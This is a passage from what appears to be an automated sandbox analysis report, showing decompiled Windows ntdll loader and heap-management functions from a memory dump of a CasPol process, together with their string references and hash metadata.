                                                                					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                                                					if(_t48 == _t43) {
                                                                						_t50 = 0x5c;
                                                                						if( *_t32 == _t50) {
                                                                							_t46 = 0x3f;
                                                                							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                                                								_t32 = _t32 + 8;
                                                                							}
                                                                						}
                                                                					}
                                                                					_t51 =  *0x1718464; // 0x74cc0110
                                                                					 *0x171b1e0(_t47, _t32,  &_v12);
                                                                					_t49 =  *_t51();
                                                                					if(_t49 >= 0) {
                                                                						L8:
                                                                						_t35 = _v12;
                                                                						if(_t35 != 0) {
                                                                							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                                                								E01659B10( *((intOrPtr*)(_t48 + 0x48)));
                                                                								_t35 = _v12;
                                                                							}
                                                                							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                                                						}
                                                                						goto L9;
                                                                					}
                                                                					if(_t49 != 0xc000008a) {
                                                                						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                                                							if(_t49 != 0xc00000bb) {
                                                                								goto L8;
                                                                							}
                                                                						}
                                                                					}
                                                                					if(( *0x1715780 & 0x00000005) != 0) {
                                                                						_push(_t49);
                                                                						E016A5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                                                						_t53 = _t53 + 0x1c;
                                                                					}
                                                                					_t49 = 0;
                                                                					goto L8;
                                                                				} else {
                                                                					goto L9;
                                                                				}
                                                                			}





















                                                                Strings
                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 0169933B, 01699367
                                                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0169932A
                                                                • LdrpFindDllActivationContext, xrefs: 01699331, 0169935D
                                                                • Querying the active activation context failed with status 0x%08lx, xrefs: 01699357
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                • API String ID: 0-3779518884
                                                                • Opcode ID: def2b98634658c98af58b39d9f5d21dbe265d9de407243c21a7bab3c2e3caa35
                                                                • Instruction ID: 9e6c8140a968b58666795a693f75d30df32a553a6cbb64c0b3c5846437c2d1b4
                                                                • Opcode Fuzzy Hash: def2b98634658c98af58b39d9f5d21dbe265d9de407243c21a7bab3c2e3caa35
                                                                • Instruction Fuzzy Hash: C0417D31A003119FEFB6AB0FCC49A3677BDBB40318F06856DDD4497A92E7B05C819781
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                • API String ID: 2994545307-336120773
                                                                • Opcode ID: c8baa1472cba264fee9725e2df9140826eb689fc66ddc401cde81c47dc783aff
                                                                • Instruction ID: 18e30b1244c23a92d2623dd536444d3fa822626a83eadb139402a13f8910175b
                                                                • Opcode Fuzzy Hash: c8baa1472cba264fee9725e2df9140826eb689fc66ddc401cde81c47dc783aff
                                                                • Instruction Fuzzy Hash: 4B31E031202514AFD322DBADCC8DF6777E9EB04631F254259F906DB285DA70E884CB69
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 78%
                                                                			E016499BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
                                                                				char _v5;
                                                                				signed int _v12;
                                                                				signed int _v16;
                                                                				signed short _v20;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				void* __ebp;
                                                                				signed short _t186;
                                                                				intOrPtr _t187;
                                                                				signed short _t190;
                                                                				signed int _t196;
                                                                				signed short _t197;
                                                                				intOrPtr _t203;
                                                                				signed int _t207;
                                                                				signed int _t210;
                                                                				signed short _t215;
                                                                				intOrPtr _t216;
                                                                				signed short _t219;
                                                                				signed int _t221;
                                                                				signed short _t222;
                                                                				intOrPtr _t228;
                                                                				signed int _t232;
                                                                				signed int _t235;
                                                                				signed int _t250;
                                                                				signed short _t251;
                                                                				intOrPtr _t252;
                                                                				signed short _t254;
                                                                				intOrPtr _t255;
                                                                				signed int _t258;
                                                                				signed int _t259;
                                                                				signed short _t262;
                                                                				intOrPtr _t271;
                                                                				signed int _t279;
                                                                				signed int _t282;
                                                                				signed int _t284;
                                                                				signed int _t286;
                                                                				intOrPtr _t292;
                                                                				signed int _t296;
                                                                				signed int _t299;
                                                                				signed int _t307;
                                                                				signed int* _t309;
                                                                				signed short* _t311;
                                                                				signed short* _t313;
                                                                				signed char _t314;
                                                                				intOrPtr _t316;
                                                                				signed int _t323;
                                                                				signed char _t328;
                                                                				signed short* _t330;
                                                                				signed char _t331;
                                                                				intOrPtr _t335;
                                                                				signed int _t342;
                                                                				signed char _t347;
                                                                				signed short* _t348;
                                                                				signed short* _t350;
                                                                				signed short _t352;
                                                                				signed char _t354;
                                                                				intOrPtr _t357;
                                                                				intOrPtr* _t364;
                                                                				signed char _t365;
                                                                				intOrPtr _t366;
                                                                				signed int _t373;
                                                                				signed char _t378;
                                                                				signed int* _t381;
                                                                				signed int _t382;
                                                                				signed short _t384;
                                                                				signed int _t386;
                                                                				unsigned int _t390;
                                                                				signed int _t393;
                                                                				signed int* _t394;
                                                                				unsigned int _t398;
                                                                				signed short _t400;
                                                                				signed short _t402;
                                                                				signed int _t404;
                                                                				signed int _t407;
                                                                				unsigned int _t411;
                                                                				signed short* _t414;
                                                                				signed int _t415;
                                                                				signed short* _t419;
                                                                				signed int* _t420;
                                                                				void* _t421;
                                                                
                                                                				_t414 = __edx;
                                                                				_t307 = __ecx;
                                                                				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
                                                                				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
                                                                					_v5 = _a8;
                                                                					L3:
                                                                					_t381 = _a4;
                                                                					goto L4;
                                                                				} else {
                                                                					__eflags =  *(__ecx + 0x4c);
                                                                					if( *(__ecx + 0x4c) != 0) {
                                                                						_t411 =  *(__ecx + 0x50) ^  *_t419;
                                                                						 *_t419 = _t411;
                                                                						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
                                                                						__eflags = _t411 >> 0x18 - _t378;
                                                                						if(__eflags != 0) {
                                                                							_push(_t378);
                                                                							E016DFA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
                                                                						}
                                                                					}
                                                                					_t250 = _a8;
                                                                					_v5 = _t250;
                                                                					__eflags = _t250;
                                                                					if(_t250 != 0) {
                                                                						_t400 = _t414[6];
                                                                						_t53 =  &(_t414[4]); // -16
                                                                						_t348 = _t53;
                                                                						_t251 =  *_t348;
                                                                						_v12 = _t251;
                                                                						_v16 = _t400;
                                                                						_t252 =  *((intOrPtr*)(_t251 + 4));
                                                                						__eflags =  *_t400 - _t252;
                                                                						if( *_t400 != _t252) {
                                                                							L49:
                                                                							_push(_t348);
                                                                							_push( *_t400);
                                                                							E016EA80D(_t307, 0xd, _t348, _t252);
                                                                							L50:
                                                                							_v5 = 0;
                                                                							goto L11;
                                                                						}
                                                                						__eflags =  *_t400 - _t348;
                                                                						if( *_t400 != _t348) {
                                                                							goto L49;
                                                                						}
                                                                						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
                                                                						_t407 =  *(_t307 + 0xb4);
                                                                						__eflags = _t407;
                                                                						if(_t407 == 0) {
                                                                							L36:
                                                                							_t364 = _v16;
                                                                							_t282 = _v12;
                                                                							 *_t364 = _t282;
                                                                							 *((intOrPtr*)(_t282 + 4)) = _t364;
                                                                							__eflags = _t414[1] & 0x00000008;
                                                                							if((_t414[1] & 0x00000008) == 0) {
                                                                								L39:
                                                                								_t365 = _t414[1];
                                                                								__eflags = _t365 & 0x00000004;
                                                                								if((_t365 & 0x00000004) != 0) {
                                                                									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
                                                                									_v12 = _t284;
                                                                									__eflags = _t365 & 0x00000002;
                                                                									if((_t365 & 0x00000002) != 0) {
                                                                										__eflags = _t284 - 4;
                                                                										if(_t284 > 4) {
                                                                											_t284 = _t284 - 4;
                                                                											__eflags = _t284;
                                                                											_v12 = _t284;
                                                                										}
                                                                									}
                                                                									_t78 =  &(_t414[8]); // -8
                                                                									_t286 = E0167D540(_t78, _t284, 0xfeeefeee);
                                                                									_v16 = _t286;
                                                                									__eflags = _t286 - _v12;
                                                                									if(_t286 != _v12) {
                                                                										_t366 =  *[fs:0x30];
                                                                										__eflags =  *(_t366 + 0xc);
                                                                										if( *(_t366 + 0xc) == 0) {
                                                                											_push("HEAP: ");
                                                                											E0162B150();
                                                                										} else {
                                                                											E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                										}
                                                                										_push(_v16 + 0x10 + _t414);
                                                                										E0162B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
                                                                										_t292 =  *[fs:0x30];
                                                                										_t421 = _t421 + 0xc;
                                                                										__eflags =  *((char*)(_t292 + 2));
                                                                										if( *((char*)(_t292 + 2)) != 0) {
                                                                											 *0x1716378 = 1;
                                                                											asm("int3");
                                                                											 *0x1716378 = 0;
                                                                										}
                                                                									}
                                                                								}
                                                                								goto L50;
                                                                							}
                                                                							_t296 = E0164A229(_t307, _t414);
                                                                							__eflags = _t296;
                                                                							if(_t296 != 0) {
                                                                								goto L39;
                                                                							} else {
                                                                								E0164A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
                                                                								goto L50;
                                                                							}
                                                                						} else {
                                                                							_t373 =  *_t414 & 0x0000ffff;
                                                                							while(1) {
                                                                								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
                                                                								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
                                                                									_t301 = _t373;
                                                                									break;
                                                                								}
                                                                								_t299 =  *_t407;
                                                                								__eflags = _t299;
                                                                								if(_t299 == 0) {
                                                                									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
                                                                									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
                                                                									break;
                                                                								} else {
                                                                									_t407 = _t299;
                                                                									continue;
                                                                								}
                                                                							}
                                                                							_t62 =  &(_t414[4]); // -16
                                                                							E0164BC04(_t307, _t407, 1, _t62, _t301, _t373);
                                                                							goto L36;
                                                                						}
                                                                					}
                                                                					L11:
                                                                					_t402 = _t419[6];
                                                                					_t25 =  &(_t419[4]); // -16
                                                                					_t350 = _t25;
                                                                					_t254 =  *_t350;
                                                                					_v12 = _t254;
                                                                					_v20 = _t402;
                                                                					_t255 =  *((intOrPtr*)(_t254 + 4));
                                                                					__eflags =  *_t402 - _t255;
                                                                					if( *_t402 != _t255) {
                                                                						L61:
                                                                						_push(_t350);
                                                                						_push( *_t402);
                                                                						E016EA80D(_t307, 0xd, _t350, _t255);
                                                                						goto L3;
                                                                					}
                                                                					__eflags =  *_t402 - _t350;
                                                                					if( *_t402 != _t350) {
                                                                						goto L61;
                                                                					}
                                                                					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
                                                                					_t404 =  *(_t307 + 0xb4);
                                                                					__eflags = _t404;
                                                                					if(_t404 == 0) {
                                                                						L20:
                                                                						_t352 = _v20;
                                                                						_t258 = _v12;
                                                                						 *_t352 = _t258;
                                                                						 *(_t258 + 4) = _t352;
                                                                						__eflags = _t419[1] & 0x00000008;
                                                                						if((_t419[1] & 0x00000008) != 0) {
                                                                							_t259 = E0164A229(_t307, _t419);
                                                                							__eflags = _t259;
                                                                							if(_t259 != 0) {
                                                                								goto L21;
                                                                							} else {
                                                                								E0164A309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
                                                                								goto L3;
                                                                							}
                                                                						}
                                                                						L21:
                                                                						_t354 = _t419[1];
                                                                						__eflags = _t354 & 0x00000004;
                                                                						if((_t354 & 0x00000004) != 0) {
                                                                							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
                                                                							__eflags = _t354 & 0x00000002;
                                                                							if((_t354 & 0x00000002) != 0) {
                                                                								__eflags = _t415 - 4;
                                                                								if(_t415 > 4) {
                                                                									_t415 = _t415 - 4;
                                                                									__eflags = _t415;
                                                                								}
                                                                							}
                                                                							_t91 =  &(_t419[8]); // -8
                                                                							_t262 = E0167D540(_t91, _t415, 0xfeeefeee);
                                                                							_v20 = _t262;
                                                                							__eflags = _t262 - _t415;
                                                                							if(_t262 != _t415) {
                                                                								_t357 =  *[fs:0x30];
                                                                								__eflags =  *(_t357 + 0xc);
                                                                								if( *(_t357 + 0xc) == 0) {
                                                                									_push("HEAP: ");
                                                                									E0162B150();
                                                                								} else {
                                                                									E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                								}
                                                                								_push(_v20 + 0x10 + _t419);
                                                                								E0162B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
                                                                								_t271 =  *[fs:0x30];
                                                                								_t421 = _t421 + 0xc;
                                                                								__eflags =  *((char*)(_t271 + 2));
                                                                								if( *((char*)(_t271 + 2)) != 0) {
                                                                									 *0x1716378 = 1;
                                                                									asm("int3");
                                                                									 *0x1716378 = 0;
                                                                								}
                                                                							}
                                                                						}
                                                                						_t381 = _a4;
                                                                						_t414 = _t419;
                                                                						_t419[1] = 0;
                                                                						_t419[3] = 0;
                                                                						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
                                                                						 *_t419 =  *_t381;
                                                                						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
                                                                						L4:
                                                                						_t420 = _t414 +  *_t381 * 8;
                                                                						if( *(_t307 + 0x4c) == 0) {
                                                                							L6:
                                                                							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
                                                                								__eflags =  *(_t307 + 0x4c);
                                                                								if( *(_t307 + 0x4c) != 0) {
                                                                									_t390 =  *(_t307 + 0x50) ^  *_t420;
                                                                									 *_t420 = _t390;
                                                                									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
                                                                									__eflags = _t390 >> 0x18 - _t328;
                                                                									if(__eflags != 0) {
                                                                										_push(_t328);
                                                                										E016DFA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
                                                                									}
                                                                								}
                                                                								__eflags = _v5;
                                                                								if(_v5 == 0) {
                                                                									L94:
                                                                									_t382 = _t420[3];
                                                                									_t137 =  &(_t420[2]); // -16
                                                                									_t309 = _t137;
                                                                									_t186 =  *_t309;
                                                                									_v20 = _t186;
                                                                									_v16 = _t382;
                                                                									_t187 =  *((intOrPtr*)(_t186 + 4));
                                                                									__eflags =  *_t382 - _t187;
                                                                									if( *_t382 != _t187) {
                                                                										L63:
                                                                										_push(_t309);
                                                                										_push( *_t382);
                                                                										_push(_t187);
                                                                										_push(_t309);
                                                                										_push(0xd);
                                                                										L64:
                                                                										E016EA80D(_t307);
                                                                										continue;
                                                                									}
                                                                									__eflags =  *_t382 - _t309;
                                                                									if( *_t382 != _t309) {
                                                                										goto L63;
                                                                									}
                                                                									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
                                                                									_t393 =  *(_t307 + 0xb4);
                                                                									__eflags = _t393;
                                                                									if(_t393 == 0) {
                                                                										L104:
                                                                										_t330 = _v16;
                                                                										_t190 = _v20;
                                                                										 *_t330 = _t190;
                                                                										 *(_t190 + 4) = _t330;
                                                                										__eflags = _t420[0] & 0x00000008;
                                                                										if((_t420[0] & 0x00000008) == 0) {
                                                                											L107:
                                                                											_t331 = _t420[0];
                                                                											__eflags = _t331 & 0x00000004;
                                                                											if((_t331 & 0x00000004) != 0) {
                                                                												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
                                                                												_v12 = _t196;
                                                                												__eflags = _t331 & 0x00000002;
                                                                												if((_t331 & 0x00000002) != 0) {
                                                                													__eflags = _t196 - 4;
                                                                													if(_t196 > 4) {
                                                                														_t196 = _t196 - 4;
                                                                														__eflags = _t196;
                                                                														_v12 = _t196;
                                                                													}
                                                                												}
                                                                												_t162 =  &(_t420[4]); // -8
                                                                												_t197 = E0167D540(_t162, _t196, 0xfeeefeee);
                                                                												_v20 = _t197;
                                                                												__eflags = _t197 - _v12;
                                                                												if(_t197 != _v12) {
                                                                													_t335 =  *[fs:0x30];
                                                                													__eflags =  *(_t335 + 0xc);
                                                                													if( *(_t335 + 0xc) == 0) {
                                                                														_push("HEAP: ");
                                                                														E0162B150();
                                                                													} else {
                                                                														E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                													}
                                                                													_push(_v20 + 0x10 + _t420);
                                                                													E0162B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
                                                                													_t203 =  *[fs:0x30];
                                                                													__eflags =  *((char*)(_t203 + 2));
                                                                													if( *((char*)(_t203 + 2)) != 0) {
                                                                														 *0x1716378 = 1;
                                                                														asm("int3");
                                                                														 *0x1716378 = 0;
                                                                													}
                                                                												}
                                                                											}
                                                                											_t394 = _a4;
                                                                											_t414[1] = 0;
                                                                											_t414[3] = 0;
                                                                											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
                                                                											 *_t414 =  *_t394;
                                                                											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
                                                                											break;
                                                                										}
                                                                										_t207 = E0164A229(_t307, _t420);
                                                                										__eflags = _t207;
                                                                										if(_t207 != 0) {
                                                                											goto L107;
                                                                										}
                                                                										E0164A309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
                                                                										continue;
                                                                									}
                                                                									_t342 =  *_t420 & 0x0000ffff;
                                                                									while(1) {
                                                                										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
                                                                										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
                                                                											break;
                                                                										}
                                                                										_t210 =  *_t393;
                                                                										__eflags = _t210;
                                                                										if(_t210 == 0) {
                                                                											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
                                                                											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
                                                                											L103:
                                                                											_t146 =  &(_t420[2]); // -16
                                                                											E0164BC04(_t307, _t393, 1, _t146, _t212, _t342);
                                                                											goto L104;
                                                                										}
                                                                										_t393 = _t210;
                                                                									}
                                                                									_t212 = _t342;
                                                                									goto L103;
                                                                								} else {
                                                                									_t384 = _t414[6];
                                                                									_t102 =  &(_t414[4]); // -16
                                                                									_t311 = _t102;
                                                                									_t215 =  *_t311;
                                                                									_v20 = _t215;
                                                                									_v16 = _t384;
                                                                									_t216 =  *((intOrPtr*)(_t215 + 4));
                                                                									__eflags =  *_t384 - _t216;
                                                                									if( *_t384 != _t216) {
                                                                										L92:
                                                                										_push(_t311);
                                                                										_push( *_t384);
                                                                										E016EA80D(_t307, 0xd, _t311, _t216);
                                                                										L93:
                                                                										_v5 = 0;
                                                                										goto L94;
                                                                									}
                                                                									__eflags =  *_t384 - _t311;
                                                                									if( *_t384 != _t311) {
                                                                										goto L92;
                                                                									}
                                                                									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
                                                                									_t386 =  *(_t307 + 0xb4);
                                                                									__eflags = _t386;
                                                                									if(_t386 == 0) {
                                                                										L79:
                                                                										_t313 = _v16;
                                                                										_t219 = _v20;
                                                                										 *_t313 = _t219;
                                                                										 *(_t219 + 4) = _t313;
                                                                										__eflags = _t414[1] & 0x00000008;
                                                                										if((_t414[1] & 0x00000008) == 0) {
                                                                											L82:
                                                                											_t314 = _t414[1];
                                                                											__eflags = _t314 & 0x00000004;
                                                                											if((_t314 & 0x00000004) != 0) {
                                                                												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
                                                                												_v12 = _t221;
                                                                												__eflags = _t314 & 0x00000002;
                                                                												if((_t314 & 0x00000002) != 0) {
                                                                													__eflags = _t221 - 4;
                                                                													if(_t221 > 4) {
                                                                														_t221 = _t221 - 4;
                                                                														__eflags = _t221;
                                                                														_v12 = _t221;
                                                                													}
                                                                												}
                                                                												_t127 =  &(_t414[8]); // -8
                                                                												_t222 = E0167D540(_t127, _t221, 0xfeeefeee);
                                                                												_v20 = _t222;
                                                                												__eflags = _t222 - _v12;
                                                                												if(_t222 != _v12) {
                                                                													_t316 =  *[fs:0x30];
                                                                													__eflags =  *(_t316 + 0xc);
                                                                													if( *(_t316 + 0xc) == 0) {
                                                                														_push("HEAP: ");
                                                                														E0162B150();
                                                                													} else {
                                                                														E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                													}
                                                                													_push(_v20 + 0x10 + _t414);
                                                                													E0162B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
                                                                													_t228 =  *[fs:0x30];
                                                                													_t421 = _t421 + 0xc;
                                                                													__eflags =  *((char*)(_t228 + 2));
                                                                													if( *((char*)(_t228 + 2)) != 0) {
                                                                														 *0x1716378 = 1;
                                                                														asm("int3");
                                                                														 *0x1716378 = 0;
                                                                													}
                                                                												}
                                                                											}
                                                                											goto L93;
                                                                										}
                                                                										_t232 = E0164A229(_t307, _t414);
                                                                										__eflags = _t232;
                                                                										if(_t232 != 0) {
                                                                											goto L82;
                                                                										}
                                                                										E0164A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
                                                                										goto L93;
                                                                									}
                                                                									_t323 =  *_t414 & 0x0000ffff;
                                                                									while(1) {
                                                                										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
                                                                										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
                                                                											break;
                                                                										}
                                                                										_t235 =  *_t386;
                                                                										__eflags = _t235;
                                                                										if(_t235 == 0) {
                                                                											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
                                                                											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
                                                                											L78:
                                                                											_t111 =  &(_t414[4]); // -16
                                                                											E0164BC04(_t307, _t386, 1, _t111, _t237, _t323);
                                                                											goto L79;
                                                                										}
                                                                										_t386 = _t235;
                                                                									}
                                                                									_t237 = _t323;
                                                                									goto L78;
                                                                								}
                                                                							}
                                                                							return _t414;
                                                                						}
                                                                						_t398 =  *(_t307 + 0x50) ^  *_t420;
                                                                						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
                                                                						if(_t398 >> 0x18 != _t347) {
                                                                							_push(_t347);
                                                                							_push(0);
                                                                							_push(0);
                                                                							_push(_t420);
                                                                							_push(3);
                                                                							goto L64;
                                                                						}
                                                                						goto L6;
                                                                					} else {
                                                                						_t277 =  *_t419 & 0x0000ffff;
                                                                						_v16 = _t277;
                                                                						while(1) {
                                                                							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
                                                                							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
                                                                								break;
                                                                							}
                                                                							_t279 =  *_t404;
                                                                							__eflags = _t279;
                                                                							if(_t279 == 0) {
                                                                								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
                                                                								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
                                                                								break;
                                                                							} else {
                                                                								_t404 = _t279;
                                                                								_t277 =  *_t419 & 0x0000ffff;
                                                                								continue;
                                                                							}
                                                                						}
                                                                						E0164BC04(_t307, _t404, 1, _t350, _t277, _v16);
                                                                						goto L20;
                                                                					}
                                                                				}
                                                                			}




















































































                                                                0x0169179e
                                                                0x016917a5
                                                                0x016917a9
                                                                0x016917c9
                                                                0x016917ce
                                                                0x016917ab
                                                                0x016917c1
                                                                0x016917c6
                                                                0x016917dc
                                                                0x016917e3
                                                                0x016917e8
                                                                0x016917ee
                                                                0x016917f1
                                                                0x016917f5
                                                                0x016917f7
                                                                0x016917fe
                                                                0x016917ff
                                                                0x016917ff
                                                                0x016917f5
                                                                0x0169179c
                                                                0x00000000
                                                                0x01691764
                                                                0x01691741
                                                                0x01691746
                                                                0x01691748
                                                                0x00000000
                                                                0x00000000
                                                                0x01691754
                                                                0x00000000
                                                                0x01691754
                                                                0x01691703
                                                                0x01691710
                                                                0x01691710
                                                                0x01691713
                                                                0x00000000
                                                                0x00000000
                                                                0x01691708
                                                                0x0169170a
                                                                0x0169170c
                                                                0x0169171c
                                                                0x0169171c
                                                                0x0169171d
                                                                0x0169171f
                                                                0x01691727
                                                                0x00000000
                                                                0x01691727
                                                                0x0169170e
                                                                0x0169170e
                                                                0x01691715
                                                                0x00000000
                                                                0x01691715
                                                                0x016916cc
                                                                0x01649a45
                                                                0x01649a45
                                                                0x01649a0e
                                                                0x01649a1c
                                                                0x01649a23
                                                                0x0169167e
                                                                0x0169167f
                                                                0x01691681
                                                                0x01691683
                                                                0x01691684
                                                                0x00000000
                                                                0x01691684
                                                                0x00000000
                                                                0x01649aad
                                                                0x01649aad
                                                                0x01649ab0
                                                                0x01649ab3
                                                                0x01649ab3
                                                                0x01649ab6
                                                                0x00000000
                                                                0x00000000
                                                                0x01649ab8
                                                                0x01649aba
                                                                0x01649abc
                                                                0x01649ac8
                                                                0x01649ac8
                                                                0x00000000
                                                                0x01649abe
                                                                0x01649abe
                                                                0x01649ac0
                                                                0x00000000
                                                                0x01649ac0
                                                                0x01649abc
                                                                0x01649ad2
                                                                0x00000000
                                                                0x01649ad2
                                                                0x01649aab

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                • API String ID: 0-3178619729
                                                                • Opcode ID: 1befcb687715da1fee43f63a51106db8a63a7022c7e3cbac19d260acb69e26c6
                                                                • Instruction ID: 424ce0efc8fce39af467f509e2dfc6a38ca5b1867c4f6cf4a4ac87e81f2a50c9
                                                                • Opcode Fuzzy Hash: 1befcb687715da1fee43f63a51106db8a63a7022c7e3cbac19d260acb69e26c6
                                                                • Instruction Fuzzy Hash: 3322F3706002469FEB25CF6DCC94B7ABBB9EF46714F28856DE8468B382D731D881CB50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 83%
                                                                			E01638794(void* __ecx) {
                                                                				signed int _v0;
                                                                				char _v8;
                                                                				signed int _v12;
                                                                				void* _v16;
                                                                				signed int _v20;
                                                                				intOrPtr _v24;
                                                                				signed int _v28;
                                                                				signed int _v32;
                                                                				signed int _v40;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				void* __ebp;
                                                                				intOrPtr* _t77;
                                                                				signed int _t80;
                                                                				signed char _t81;
                                                                				signed int _t87;
                                                                				signed int _t91;
                                                                				void* _t92;
                                                                				void* _t94;
                                                                				signed int _t95;
                                                                				signed int _t103;
                                                                				signed int _t105;
                                                                				signed int _t110;
                                                                				signed int _t118;
                                                                				intOrPtr* _t121;
                                                                				intOrPtr _t122;
                                                                				signed int _t125;
                                                                				signed int _t129;
                                                                				signed int _t131;
                                                                				signed int _t134;
                                                                				signed int _t136;
                                                                				signed int _t143;
                                                                				signed int* _t147;
                                                                				signed int _t151;
                                                                				void* _t153;
                                                                				signed int* _t157;
                                                                				signed int _t159;
                                                                				signed int _t161;
                                                                				signed int _t166;
                                                                				signed int _t168;
                                                                
                                                                				_push(__ecx);
                                                                				_t153 = __ecx;
                                                                				_t159 = 0;
                                                                				_t121 = __ecx + 0x3c;
                                                                				if( *_t121 == 0) {
                                                                					L2:
                                                                					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                                                					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                                                						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                                                						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                                                						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
